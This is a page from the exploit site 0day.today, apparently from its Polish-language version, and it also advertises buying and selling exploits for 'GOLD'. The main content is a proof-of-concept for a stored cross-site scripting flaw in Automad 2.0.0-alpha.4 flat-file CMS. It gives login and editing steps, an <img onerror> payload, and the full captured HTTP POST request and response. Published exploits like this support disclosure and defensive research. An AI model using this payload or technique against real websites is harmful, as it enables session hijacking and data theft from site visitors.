0day.today - Największa Baza Exploitów na Świecie.
Informacje które powinieneś wiedzieć o 0day.today:
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
- Korzystamy z jednej głównej domeny: http://0day.today
- Większość materiałów jest kompletnie DARMOWA
- Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
musisz zakupić lub zdobyć GOLD
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Przeczytaj [ ugoda ]
- Przeczytaj [ Wyślij ] zasady
- Odwiedź [ faq ] strona
- [ Zarejestruj ] profil
- Zdobądź [ GOLD ]
- Jeżeli chcesz [ sprzedaj ]
- Jeżeli chcesz [ kup ]
- Jeżeli stracisz [ Konto ]
- Jakiekolwiek pytania [ [email protected] ]
- Strona autoryzacyjna
- Strona rejestracyjna
- Odzyskiwanie konta
- Strona FAQ
- Strona kontaktowa
- Zasady publikowania
- Strona
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Możesz się z nami skonaktować przez:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting Vulnerability
Autor
Ryzyko
[
Średnie Zagrożenie Bezpieczeństwa
]0day-ID
Kategoria
Data dodania
Platforma
# Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS) # Exploit Author: Jerry Thomas (w3bn00b3r) # Vendor Homepage: https://automad.org # Software Link: https://github.com/marcantondahmen/automad # Category: Web Application [Flat File CMS] # Version: 2.0.0-alpha.4 # Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 (bullseye) # Description A persistent (stored) cross-site scripting (XSS) vulnerability has been identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker to inject malicious JavaScript code into the template body. The injected code is stored within the flat file CMS and is executed in the browser of any user visiting the forum. This can result in session hijacking, data theft, and other malicious activities. # Proof-of-Concept *Step-1:* Login as Admin & Navigate to the endpoint http://localhost/dashboard/home *Step-2:* There will be a default Welcome page. You will find an option to edit it. *Step-3:* Navigate to Content tab or http://localhost/dashboard/page?url=%2F§ion=text & edit the block named ***`Main`*** *Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)> *Request:* POST /_api/page/data HTTP/1.1 Host: localhost Content-Length: 1822 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv Accept: */* Origin: http://localhost Referer: http://localhost/dashboard/page?url=%2F§ion=text Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb Connection: close ------WebKitFormBoundaryzHmXQBdtZsTYQYCv Content-Disposition: form-data; name="__csrf__" 49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1 ------WebKitFormBoundaryzHmXQBdtZsTYQYCv Content-Disposition: form-data; name="__json__" {"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><img src=x onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"} ------WebKitFormBoundaryzHmXQBdtZsTYQYCv-- *Response:* HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Thu, 20 Jun 2024 19:17:35 GMT Content-Type: application/json; charset=utf-8 Connection: close X-Powered-By: PHP/8.3.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 30` {"code":200,"time":1718911055} *Step-5:* XSS triggers when you go to homepage - http://localhost/ # 0day.today [2024-07-04] #